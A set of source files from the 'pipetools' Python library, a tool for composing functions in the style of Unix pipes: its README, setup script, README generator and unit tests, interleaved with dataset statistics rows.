| 2,068 | changelog | rst | en | restructuredtext | text | {"qsc_doc_frac_chars_curly_bracket": 0.0, "qsc_doc_frac_words_redpajama_stop": 0.125, "qsc_doc_num_sentences": 46.0, "qsc_doc_num_words": 342, "qsc_doc_num_chars": 2068.0, "qsc_doc_num_lines": 159.0, "qsc_doc_mean_word_length": 3.89766082, "qsc_doc_frac_words_full_bracket": 0.0, "qsc_doc_frac_lines_end_with_readmore": 0.0, "qsc_doc_frac_lines_start_with_bullet": 0.0, "qsc_doc_frac_words_unique": 0.51754386, "qsc_doc_entropy_unigram": 4.78032926, "qsc_doc_frac_words_all_caps": 0.0141129, "qsc_doc_frac_lines_dupe_lines": 0.23469388, "qsc_doc_frac_chars_dupe_lines": 0.12048193, "qsc_doc_frac_chars_top_2grams": 0.012003, "qsc_doc_frac_chars_top_3grams": 0.01350338, "qsc_doc_frac_chars_top_4grams": 0.024006, "qsc_doc_frac_chars_dupe_5grams": 0.0, "qsc_doc_frac_chars_dupe_6grams": 0.0, "qsc_doc_frac_chars_dupe_7grams": 0.0, "qsc_doc_frac_chars_dupe_8grams": 0.0, "qsc_doc_frac_chars_dupe_9grams": 0.0, "qsc_doc_frac_chars_dupe_10grams": 0.0, "qsc_doc_frac_chars_replacement_symbols": 0.0, "qsc_doc_cate_code_related_file_name": 0.0, "qsc_doc_num_chars_sentence_length_mean": 9.09268293, "qsc_doc_frac_chars_hyperlink_html_tag": 0.0, "qsc_doc_frac_chars_alphabet": 0.64298297, "qsc_doc_frac_chars_digital": 0.13975338, "qsc_doc_frac_chars_whitespace": 0.17649903, "qsc_doc_frac_chars_hex_words": 0.0} | 1 | {"qsc_doc_frac_chars_replacement_symbols": 0, "qsc_doc_entropy_unigram": 0, "qsc_doc_frac_chars_top_2grams": 0, "qsc_doc_frac_chars_top_3grams": 0, "qsc_doc_frac_chars_top_4grams": 0, "qsc_doc_frac_chars_dupe_5grams": 0, "qsc_doc_frac_chars_dupe_6grams": 0, "qsc_doc_frac_chars_dupe_7grams": 0, "qsc_doc_frac_chars_dupe_8grams": 0, "qsc_doc_frac_chars_dupe_9grams": 0, "qsc_doc_frac_chars_dupe_10grams": 0, "qsc_doc_frac_chars_dupe_lines": 0, "qsc_doc_frac_lines_dupe_lines": 0, "qsc_doc_frac_lines_end_with_readmore": 0, "qsc_doc_frac_lines_start_with_bullet": 0, "qsc_doc_frac_words_all_caps": 0, "qsc_doc_mean_word_length": 0, "qsc_doc_num_chars": 0, "qsc_doc_num_lines": 0, "qsc_doc_num_sentences": 0, "qsc_doc_num_words": 0, "qsc_doc_frac_chars_hex_words": 0, "qsc_doc_frac_chars_hyperlink_html_tag": 0, "qsc_doc_frac_chars_alphabet": 0, "qsc_doc_frac_chars_digital": 0, "qsc_doc_frac_chars_whitespace": 0} |
0101/pipetools | README.rst |
Pipetools
=========
|tests-badge| |coverage-badge| |pypi-badge|
.. |tests-badge| image:: https://github.com/0101/pipetools/actions/workflows/tests.yml/badge.svg
:target: https://github.com/0101/pipetools/actions/workflows/tests.yml
.. |coverage-badge| image:: https://raw.githubusercontent.com/0101/pipetools/master/coverage.svg
:target: https://github.com/0101/pipetools/actions/workflows/tests.yml
.. |pypi-badge| image:: https://img.shields.io/pypi/dm/pipetools.svg
:target: https://pypi.org/project/pipetools/
`Complete documentation <https://0101.github.io/pipetools/doc/>`_
``pipetools`` enables function composition similar to using Unix pipes.
It allows forward-composition and piping of arbitrary functions - no need to decorate them or do anything extra.
It also packs a bunch of utils that make common operations more convenient and readable.
Source is on github_.
.. _github: https://github.com/0101/pipetools
Why?
----
Piping and function composition are some of the most natural operations there are for
plenty of programming tasks. Yet Python doesn't have a built-in way of performing them.
That forces you to either deep nesting of function calls or adding extra **glue code**.
Example
-------
Say you want to create a list of python files in a given directory, ordered by
filename length, as a string, each file on one line and also with line numbers:
.. code-block:: pycon
>>> print(pyfiles_by_length('../pipetools'))
1. ds_builder.py
2. __init__.py
3. compat.py
4. utils.py
5. main.py
All the ingredients are already there, you just have to glue them together. You might write it like this:
.. code-block:: python
def pyfiles_by_length(directory):
all_files = os.listdir(directory)
py_files = [f for f in all_files if f.endswith('.py')]
sorted_files = sorted(py_files, key=len, reverse=True)
numbered = enumerate(py_files, 1)
rows = ("{0}. {1}".format(i, f) for i, f in numbered)
return '\n'.join(rows)
Or perhaps like this:
.. code-block:: python
def pyfiles_by_length(directory):
return '\n'.join('{0}. {1}'.format(*x) for x in enumerate(reversed(sorted(
[f for f in os.listdir(directory) if f.endswith('.py')], key=len)), 1))
Or, if you're a mad scientist, you would probably do it like this:
.. code-block:: python
pyfiles_by_length = lambda d: (reduce('{0}\n{1}'.format,
map(lambda x: '%d. %s' % x, enumerate(reversed(sorted(
filter(lambda f: f.endswith('.py'), os.listdir(d)), key=len))))))
But *there should be one -- and preferably only one -- obvious way to do it*.
So which one is it? Well, to redeem the situation, ``pipetools`` give you yet
another possibility!
.. code-block:: python
pyfiles_by_length = (pipe
| os.listdir
| where(X.endswith('.py'))
| sort_by(len).descending
| (enumerate, X, 1)
| foreach("{0}. {1}")
| '\n'.join)
*Why would I do that*, you ask? Comparing to the *native* Python code, it's
- **Easier to read** -- minimal extra clutter
- **Easier to understand** -- one-way data flow from one step to the next, nothing else to keep track of
- **Easier to change** -- want more processing? just add a step to the pipeline
- **Removes some bug opportunities** -- did you spot the bug in the first example?
Of course it won't solve all your problems, but a great deal of code *can*
be expressed as a pipeline, giving you the above benefits. Read on to see how it works!
Installation
------------
.. code-block:: console
$ pip install pipetools
`Uh, what's that? <https://pip.pypa.io>`_
Usage
-----
.. _the-pipe:
The pipe
""""""""
The ``pipe`` object can be used to pipe functions together to
form new functions, and it works like this:
.. code-block:: python
from pipetools import pipe
f = pipe | a | b | c
# is the same as:
def f(x):
return c(b(a(x)))
A real example, sum of odd numbers from 0 to *x*:
.. code-block:: python
from functools import partial
from pipetools import pipe
odd_sum = pipe | range | partial(filter, lambda x: x % 2) | sum
odd_sum(10) # -> 25
Note that the chain up to the `sum` is lazy.
Automatic partial application in the pipe
"""""""""""""""""""""""""""""""""""""""""
As partial application is often useful when piping things together, it is done
automatically when the *pipe* encounters a tuple, so this produces the same
result as the previous example:
.. code-block:: python
odd_sum = pipe | range | (filter, lambda x: x % 2) | sum
As of ``0.1.9``, this is even more powerful, see `X-partial <https://0101.github.io/pipetools/doc/xpartial.html>`_.
Built-in tools
""""""""""""""
Pipetools contain a set of *pipe-utils* that solve some common tasks. For
example there is a shortcut for the filter class from our example, called
`where() <https://0101.github.io/pipetools/doc/pipeutils.html#pipetools.utils.where>`_:
.. code-block:: python
from pipetools import pipe, where
odd_sum = pipe | range | where(lambda x: x % 2) | sum
Well that might be a bit more readable, but not really a huge improvement, but
wait!
If a *pipe-util* is used as first or second item in the pipe (which happens
quite often) the ``pipe`` at the beginning can be omitted:
.. code-block:: python
odd_sum = range | where(lambda x: x % 2) | sum
See `pipe-utils' documentation <https://0101.github.io/pipetools/doc/pipeutils.html>`_.
OK, but what about the ugly lambda?
"""""""""""""""""""""""""""""""""""
`where() <https://0101.github.io/pipetools/doc/pipeutils.html#pipetools.utils.where>`_, but also `foreach() <https://0101.github.io/pipetools/doc/pipeutils.html#pipetools.utils.foreach>`_,
`sort_by() <https://0101.github.io/pipetools/doc/pipeutils.html#pipetools.utils.sort_by>`_ and other `pipe-utils <https://0101.github.io/pipetools/doc/pipeutils.html>`_ can be
quite useful, but require a function as an argument, which can either be a named
function -- which is OK if it does something complicated -- but often it's
something simple, so it's appropriate to use a ``lambda``. Except Python's
lambdas are quite verbose for simple tasks and the code gets cluttered...
**X object** to the rescue!
.. code-block:: python
from pipetools import where, X
odd_sum = range | where(X % 2) | sum
How 'bout that.
`Read more about the X object and it's limitations. <https://0101.github.io/pipetools/doc/xobject.html>`_
.. _auto-string-formatting:
Automatic string formatting
"""""""""""""""""""""""""""
Since it doesn't make sense to compose functions with strings, when a pipe (or a
`pipe-util <https://0101.github.io/pipetools/doc/pipeutils.html>`_) encounters a string, it attempts to use it for
`(advanced) formatting`_:
.. code-block:: pycon
>>> countdown = pipe | (range, 1) | reversed | foreach('{}...') | ' '.join | '{} boom'
>>> countdown(5)
'4... 3... 2... 1... boom'
.. _(advanced) formatting: http://docs.python.org/library/string.html#formatstrings
Feeding the pipe
""""""""""""""""
Sometimes it's useful to create a one-off pipe and immediately run some input
through it. And since this is somewhat awkward (and not very readable,
especially when the pipe spans multiple lines):
.. code-block:: python
result = (pipe | foo | bar | boo)(some_input)
It can also be done using the ``>`` operator:
.. code-block:: python
result = some_input > pipe | foo | bar | boo
.. note::
Note that the above method of input won't work if the input object
defines `__gt__ <https://docs.python.org/3/reference/datamodel.html#object.__gt__>`_
for *any* object - including the pipe. This can be the case for example with
some objects from math libraries such as NumPy. If you experience strange
results try falling back to the standard way of passing input into a pipe.
But wait, there is more
-----------------------
Checkout `the Maybe pipe <https://0101.github.io/pipetools/doc/maybe>`_, `partial application on steroids <https://0101.github.io/pipetools/doc/xpartial>`_
or `automatic data structure creation <https://0101.github.io/pipetools/doc/pipeutils#automatic-data-structure-creation>`_
in the `full documentation <https://0101.github.io/pipetools/doc/#contents>`_.
| 8,308 | README | rst | en | restructuredtext | text | {"qsc_doc_frac_chars_curly_bracket": 0.00240732, "qsc_doc_frac_words_redpajama_stop": 0.23770907, "qsc_doc_num_sentences": 164.0, "qsc_doc_num_words": 1262, "qsc_doc_num_chars": 8308.0, "qsc_doc_num_lines": 264.0, "qsc_doc_mean_word_length": 4.46117274, "qsc_doc_frac_words_full_bracket": 0.0, "qsc_doc_frac_lines_end_with_readmore": 0.00378788, "qsc_doc_frac_lines_start_with_bullet": 0.0, "qsc_doc_frac_words_unique": 0.3066561, "qsc_doc_entropy_unigram": 5.35552952, "qsc_doc_frac_words_all_caps": 0.00557527, "qsc_doc_frac_lines_dupe_lines": 0.12345679, "qsc_doc_frac_chars_dupe_lines": 0.07273665, "qsc_doc_frac_chars_top_2grams": 0.02397869, "qsc_doc_frac_chars_top_3grams": 0.03730018, "qsc_doc_frac_chars_top_4grams": 0.04227353, "qsc_doc_frac_chars_dupe_5grams": 0.22149201, "qsc_doc_frac_chars_dupe_6grams": 0.20781528, "qsc_doc_frac_chars_dupe_7grams": 0.1722913, "qsc_doc_frac_chars_dupe_8grams": 0.11385435, "qsc_doc_frac_chars_dupe_9grams": 0.09147425, "qsc_doc_frac_chars_dupe_10grams": 0.08241563, "qsc_doc_frac_chars_replacement_symbols": 0.0, "qsc_doc_cate_code_related_file_name": 1.0, "qsc_doc_num_chars_sentence_length_mean": 16.71641791, "qsc_doc_frac_chars_hyperlink_html_tag": 0.10989408, "qsc_doc_frac_chars_alphabet": 0.80507733, "qsc_doc_frac_chars_digital": 0.01634082, "qsc_doc_frac_chars_whitespace": 0.17501204, "qsc_doc_frac_chars_hex_words": 0.0} | 1 | {"qsc_doc_frac_chars_replacement_symbols": 0, "qsc_doc_entropy_unigram": 0, "qsc_doc_frac_chars_top_2grams": 0, "qsc_doc_frac_chars_top_3grams": 0, "qsc_doc_frac_chars_top_4grams": 0, "qsc_doc_frac_chars_dupe_5grams": 0, "qsc_doc_frac_chars_dupe_6grams": 0, "qsc_doc_frac_chars_dupe_7grams": 0, "qsc_doc_frac_chars_dupe_8grams": 0, "qsc_doc_frac_chars_dupe_9grams": 0, "qsc_doc_frac_chars_dupe_10grams": 0, "qsc_doc_frac_chars_dupe_lines": 0, "qsc_doc_frac_lines_dupe_lines": 0, "qsc_doc_frac_lines_end_with_readmore": 0, "qsc_doc_frac_lines_start_with_bullet": 0, "qsc_doc_frac_words_all_caps": 0, "qsc_doc_mean_word_length": 0, "qsc_doc_num_chars": 0, "qsc_doc_num_lines": 0, "qsc_doc_num_sentences": 0, "qsc_doc_num_words": 0, "qsc_doc_frac_chars_hex_words": 0, "qsc_doc_frac_chars_hyperlink_html_tag": 0, "qsc_doc_frac_chars_alphabet": 0, "qsc_doc_frac_chars_digital": 0, "qsc_doc_frac_chars_whitespace": 0} |
0101/pipetools | setup.py | import io
import sys
from setuptools import setup
from setuptools.command.test import test as TestCommand
from pipetools import xpartial, X
import pipetools
class PyTest(TestCommand):
def finalize_options(self):
TestCommand.finalize_options(self)
self.test_args = []
self.test_suite = True
def run_tests(self):
# import here, cause outside the eggs aren't loaded
import pytest
error_code = pytest.main(self.test_args)
sys.exit(error_code)
setup(
name='pipetools',
version=pipetools.__versionstr__,
description=('A library that enables function composition similar to '
'using Unix pipes.'),
long_description='README.rst' > xpartial(io.open, X, encoding="utf-8") | X.read(),
author='Petr Pokorny',
author_email='petr@innit.cz',
license='MIT',
url='https://0101.github.io/pipetools/',
packages=['pipetools'],
include_package_data=True,
install_requires=(
'setuptools>=0.6b1',
),
tests_require=(
'pytest',
),
cmdclass={'test': PyTest},
classifiers=[
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 3',
'Topic :: Utilities',
]
)
| 1,434 | setup | py | en | python | code | {"qsc_code_num_words": 159, "qsc_code_num_chars": 1434.0, "qsc_code_mean_word_length": 5.64150943, "qsc_code_frac_words_unique": 0.64779874, "qsc_code_frac_chars_top_2grams": 0.02675585, "qsc_code_frac_chars_top_3grams": 0.04236343, "qsc_code_frac_chars_top_4grams": 0.0, "qsc_code_frac_chars_dupe_5grams": 0.0, "qsc_code_frac_chars_dupe_6grams": 0.0, "qsc_code_frac_chars_dupe_7grams": 0.0, "qsc_code_frac_chars_dupe_8grams": 0.0, "qsc_code_frac_chars_dupe_9grams": 0.0, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.0101196, "qsc_code_frac_chars_whitespace": 0.24198047, "qsc_code_size_file_byte": 1434.0, "qsc_code_num_lines": 53.0, "qsc_code_num_chars_line_max": 87.0, "qsc_code_num_chars_line_mean": 27.05660377, "qsc_code_frac_chars_alphabet": 0.8150874, "qsc_code_frac_chars_comments": 0.03417015, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.04545455, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.3087491, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codepython_cate_ast": 1.0, "qsc_codepython_frac_lines_func_ratio": 0.04545455, "qsc_codepython_cate_var_zero": false, "qsc_codepython_frac_lines_pass": 0.0, "qsc_codepython_frac_lines_import": 0.15909091, "qsc_codepython_frac_lines_simplefunc": 0.0, "qsc_codepython_score_lines_no_logic": 0.22727273, "qsc_codepython_frac_lines_print": 0.0} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codepython_cate_ast": 0, "qsc_codepython_frac_lines_func_ratio": 0, "qsc_codepython_cate_var_zero": 0, "qsc_codepython_frac_lines_pass": 0, "qsc_codepython_frac_lines_import": 0, "qsc_codepython_frac_lines_simplefunc": 0, "qsc_codepython_score_lines_no_logic": 0, "qsc_codepython_frac_lines_print": 0} |
0101/pipetools | build_scripts/generate_readme.py | """
A script for generating a README file from docs/overview page
"""
import codecs
import re
from pipetools import foreach, X, pipe
DOC_ROOT = 'https://0101.github.io/pipetools/doc/'
readme_template = """
Pipetools
=========
|tests-badge| |coverage-badge| |pypi-badge|
.. |tests-badge| image:: https://github.com/0101/pipetools/actions/workflows/tests.yml/badge.svg
:target: https://github.com/0101/pipetools/actions/workflows/tests.yml
.. |coverage-badge| image:: https://raw.githubusercontent.com/0101/pipetools/master/coverage.svg
:target: https://github.com/0101/pipetools/actions/workflows/tests.yml
.. |pypi-badge| image:: https://img.shields.io/pypi/dm/pipetools.svg
:target: https://pypi.org/project/pipetools/
`Complete documentation <{0}>`_
{{0}}
But wait, there is more
-----------------------
Checkout `the Maybe pipe <{0}maybe>`_, `partial application on steroids <{0}xpartial>`_
or `automatic data structure creation <{0}pipeutils#automatic-data-structure-creation>`_
in the `full documentation <{0}#contents>`_.
""".format(DOC_ROOT)
link_template = u"`{text} <%s{url}>`_" % DOC_ROOT
link_replacements = (
# :doc:`pipe-utils' documentation<pipeutils>`.
(r":doc:`([^<]*)<([^>]*)>`", {'url': r'\2.html', 'text': r'\1'}),
# :func:`~pipetools.utils.where`
(r":func:`~pipetools\.utils\.([^`]*)`",
{'url': r'pipeutils.html#pipetools.utils.\1', 'text': r'\1()'}),
) > foreach([X[0] | re.compile, X[1] | link_template])
def create_readme():
with codecs.open('docs/source/overview.rst', 'r', 'utf-8') as overview:
with codecs.open('README.rst', 'w+', 'utf-8') as readme:
overview.read() > pipe | fix_links | readme_template | readme.write
def fix_links(string):
for pattern, replacement in link_replacements:
string = pattern.sub(replacement, string)
return string
if __name__ == '__main__':
create_readme()
| 1,914 | generate_readme | py | en | python | code | {"qsc_code_num_words": 249, "qsc_code_num_chars": 1914.0, "qsc_code_mean_word_length": 4.98795181, "qsc_code_frac_words_unique": 0.42168675, "qsc_code_frac_chars_top_2grams": 0.02254428, "qsc_code_frac_chars_top_3grams": 0.05152979, "qsc_code_frac_chars_top_4grams": 0.04347826, "qsc_code_frac_chars_dupe_5grams": 0.13768116, "qsc_code_frac_chars_dupe_6grams": 0.13768116, "qsc_code_frac_chars_dupe_7grams": 0.13768116, "qsc_code_frac_chars_dupe_8grams": 0.13768116, "qsc_code_frac_chars_dupe_9grams": 0.13768116, "qsc_code_frac_chars_dupe_10grams": 0.09661836, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.02050663, "qsc_code_frac_chars_whitespace": 0.13375131, "qsc_code_size_file_byte": 1914.0, "qsc_code_num_lines": 69.0, "qsc_code_num_chars_line_max": 97.0, "qsc_code_num_chars_line_mean": 27.73913043, "qsc_code_frac_chars_alphabet": 0.72858866, "qsc_code_frac_chars_comments": 0.07210031, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.05263158, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.10526316, "qsc_code_frac_chars_string_length": 0.60215054, "qsc_code_frac_chars_long_word_length": 0.10582909, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codepython_cate_ast": 1.0, "qsc_codepython_frac_lines_func_ratio": 0.05263158, "qsc_codepython_cate_var_zero": false, "qsc_codepython_frac_lines_pass": 0.0, "qsc_codepython_frac_lines_import": 0.07894737, "qsc_codepython_frac_lines_simplefunc": 0.0, "qsc_codepython_score_lines_no_logic": 0.15789474, "qsc_codepython_frac_lines_print": 0.0} | 0 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 1, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codepython_cate_ast": 0, "qsc_codepython_frac_lines_func_ratio": 0, "qsc_codepython_cate_var_zero": 0, "qsc_codepython_frac_lines_pass": 0, "qsc_codepython_frac_lines_import": 0, "qsc_codepython_frac_lines_simplefunc": 0, "qsc_codepython_score_lines_no_logic": 0, "qsc_codepython_frac_lines_print": 0} |
0101/pipetools | test_pipetools/test_main.py | # encoding: utf-8
import pytest
from pipetools import pipe, X, maybe, xpartial
from pipetools.main import StringFormatter
from pipetools.compat import range
class Bunch:
def __init__(self, **kwargs):
self.__dict__.update(kwargs)
class TestPipe(object):
pipe = property(lambda self: pipe)
def test_pipe(self):
p = self.pipe | str | (lambda x: x * 2)
assert p(5) == '55'
def test_pipe_right(self):
f = sum | self.pipe | str
assert f([1, 2, 3]) == '6'
def test_pipe_input(self):
result = [1, 2, 3] > self.pipe | sum
assert result == 6
def test_pipe_right_X(self):
f = X[0] | self.pipe | str
assert f([1, 2, 3]) == '1'
def test_string_formatting(self):
f = self.pipe | 'The answer is {0}.'
assert f(42) == 'The answer is 42.'
def test_unicode_formatting(self):
f = self.pipe | u'That will be £ {0}, please.'
assert f(42) == u'That will be £ 42, please.'
def test_makes_a_bound_method(self):
class SomeClass(object):
attr = 'foo bar'
method = X.attr.split() | reversed | ' '.join
assert SomeClass().method() == 'bar foo'
class TestX:
def test_basic(self):
f = ~X.startswith('Hello')
assert f('Hello world')
assert not f('Goodbye world')
def test_chained(self):
f = ~X.get('item', '').startswith('Hello')
assert f({'item': 'Hello world'})
assert not f({'item': 'Goodbye world'})
assert not f({})
def test_passthrough(self):
f = ~X
assert f(42) == 42
def test_mod(self):
f = ~(X % 2)
g = ~(9 % X)
assert f(3)
assert not g(3)
assert g(2)
assert not f(2)
def test_gt(self):
f = ~(X > 5)
g = ~(6 > X)
assert f(6)
assert not g(6)
assert g(5)
assert not f(5)
def test_gte(self):
f = ~(X >= 5)
g = ~(4 >= X)
assert f(5)
assert not g(5)
assert g(4)
assert not f(4)
def test_lt(self):
f = ~(X < 5)
g = ~(4 < X)
assert f(4)
assert not g(4)
assert g(5)
assert not f(5)
def test_lte(self):
f = ~(X <= 5)
g = ~(6 <= X)
assert f(5)
assert not g(5)
assert g(6)
assert not f(6)
def test_chained_gt(self):
f = ~(X.thing > 5)
assert f(Bunch(thing=6))
assert not f(Bunch(thing=4))
def test_index(self):
f = ~(X['item'])
assert f({'item': 42}) == 42
def test_eq(self):
f = ~(X == 42)
assert f(42)
assert not f('whatever')
def test_neq(self):
f = ~(X != 42)
assert not f(42)
assert f('whatever')
def test_pos(self):
f = ~+X
assert f(4) == 4
def test_neg(self):
f = ~-X
assert f(5) == -5
def test_pipe_right(self):
f = str | X[0]
assert f(10) == '1'
def test_pipe_left(self):
f = X[0] | int
assert f('10') == 1
def test_call(self):
f = ~X(42)
assert f(lambda n: n / 2) == 21
def test_mul(self):
f = ~(X * 3)
g = ~(3 * X)
assert f(10) == g(10) == 30
assert f('x') == g('x') == 'xxx'
def test_add(self):
assert (~(X + 2))(40) == 42
assert (~('4' + X))('2') == '42'
assert (~([4] + X))([2]) == [4, 2]
def test_sub(self):
assert (~(X - 3))(5) == (5 - 3)
assert (~(5 - X))(3) == (5 - 3)
def test_pow(self):
assert (~(X ** 3))(5) == (5 ** 3)
assert (~(5 ** X))(3) == (5 ** 3)
def test_div(self):
assert (~(X / 2))(4) == 2
assert (~(4 / X))(2) == 2
def test_floor_dev(self):
assert (~(X // 2))(5) == 2
assert (~(5 // X))(2) == 2
def test_mod(self):
assert (~(X % 5))('%.2f') == '5.00'
assert (~(5 % X))(2) == 1
def test_lshift(self):
assert (~(X << 2))(5) == 20
assert (~(2 << X))(5) == 64
def test_rshift(self):
assert (~(X >> 1))(5) == 2
assert (~(5 >> X))(1) == 2
def test_xor(self):
assert (~(X ^ 2))(3) == 1
assert (~(1 ^ X))(3) == 2
def test_and(self):
assert (~(X & 2))(3) == 2
assert (~(1 & X))(3) == 1
def test_in(self):
container = 'asdf'
f = ~X._in_(container)
assert f('a')
assert not f('b')
def test_repr(self):
f = ~X.attr(1, 2, three='four')
assert repr(f) == "X.attr | X(1, 2, three='four')"
def test_repr_unicode(self):
f = ~(X + u"Žluťoučký kůň")
# in this case I'll just consider not throwing an error a success
assert repr(f)
def test_repr_tuple(self):
f = ~(X + (1, 2))
assert repr(f) == "X + (1, 2)"
class TestStringFormatter:
def test_format_tuple(self):
f = StringFormatter('{0} + {0} = {1}')
assert f((1, 2)) == '1 + 1 = 2'
def test_format_list(self):
f = StringFormatter('{0} + {0} = {1}')
assert f([1, 2]) == '1 + 1 = 2'
def test_format_generator(self):
f = StringFormatter('{0} + {0} = {1}')
assert f(range(1, 3)) == '1 + 1 = 2'
def test_format_dict(self):
f = StringFormatter('{a} and {b}')
assert f(dict(a='A', b='B')) == 'A and B'
def test_format_one_arg(self):
f = StringFormatter('This is {0}!!1')
assert f('Spartah') == 'This is Spartah!!1'
def test_unicode(self):
f = StringFormatter('Asdf {0}')
assert f(u'Žluťoučký kůň') == u'Asdf Žluťoučký kůň'
def test_unicode2(self):
f = StringFormatter(u'Asdf {0}')
assert f(u'Žluťoučký kůň') == u'Asdf Žluťoučký kůň'
class TestMaybe(TestPipe):
# maybe should also pass default pipe tests
pipe = property(lambda self: maybe)
def test_maybe_basic(self):
f = maybe | (lambda: None) | X * 2
assert f() is None
def test_none_input(self):
assert (None > maybe | sum) is None
def test_none_input_call(self):
assert (maybe | sum)(None) is None
class TestPipeInAPipe:
def test_maybe_in_a_pipe_catches_none(self):
f = pipe | str | int | (lambda x: None) | maybe | X.hello
assert f(3) is None
def test_maybe_in_a_pipe_goes_through(self):
f = pipe | str | int | maybe | (X * 2)
assert f(3) == 6
def test_maybe_in_a_pipe_not_active_before_its_place(self):
f = pipe | str | (lambda x: None) | int | maybe | X.hello
with pytest.raises(TypeError):
f(3)
def test_pipe_in_a_pipe_because_why_not(self):
f = pipe | str | pipe | int
assert f(3) == 3
def dummy(*args, **kwargs):
return args, kwargs
class TestXPartial:
def test_should_behave_like_partial(self):
xf = xpartial(dummy, 1, kwarg='kwarg')
assert xf(2, foo='bar') == ((1, 2), {'kwarg': 'kwarg', 'foo': 'bar'})
def test_x_placeholder(self):
xf = xpartial(dummy, X, 2)
assert xf(1) == ((1, 2), {})
def test_x_kw_placeholder(self):
xf = xpartial(dummy, kwarg=X)
assert xf(1) == ((), {'kwarg': 1})
def test_x_destructuring(self):
xf = xpartial(dummy, X['name'], number=X['number'])
d = {'name': "Fred", 'number': 42, 'something': 'else'}
assert xf(d) == (('Fred',), {'number': 42})
def test_repr(self):
xf = xpartial(dummy, X, 3, something=X['something'])
assert repr(X | xf) == "X | dummy(X, 3, something=X['something'])"
def test_should_raise_error_when_not_given_an_argument(self):
# -- when created with a placeholder
xf = xpartial(dummy, something=X)
with pytest.raises(ValueError):
xf()
def test_can_xpartial_any_callable(self):
class my_callable(object):
def __call__(self, x):
return "hello %s" % x
f = xpartial(my_callable(), (X + "!"))
assert f("x") == "hello x!"
| 8,145 | test_main | py | en | python | code | {"qsc_code_num_words": 1161, "qsc_code_num_chars": 8145.0, "qsc_code_mean_word_length": 3.39879414, "qsc_code_frac_words_unique": 0.16709733, "qsc_code_frac_chars_top_2grams": 0.1064369, "qsc_code_frac_chars_top_3grams": 0.03193107, "qsc_code_frac_chars_top_4grams": 0.01824633, "qsc_code_frac_chars_dupe_5grams": 0.294222, "qsc_code_frac_chars_dupe_6grams": 0.19031931, "qsc_code_frac_chars_dupe_7grams": 0.12062848, "qsc_code_frac_chars_dupe_8grams": 0.12062848, "qsc_code_frac_chars_dupe_9grams": 0.10238216, "qsc_code_frac_chars_dupe_10grams": 0.07602636, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.04394998, "qsc_code_frac_chars_whitespace": 0.33235114, "qsc_code_size_file_byte": 8145.0, "qsc_code_num_lines": 365.0, "qsc_code_num_chars_line_max": 78.0, "qsc_code_num_chars_line_mean": 22.31506849, "qsc_code_frac_chars_alphabet": 0.68131666, "qsc_code_frac_chars_comments": 0.01915285, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.08119658, 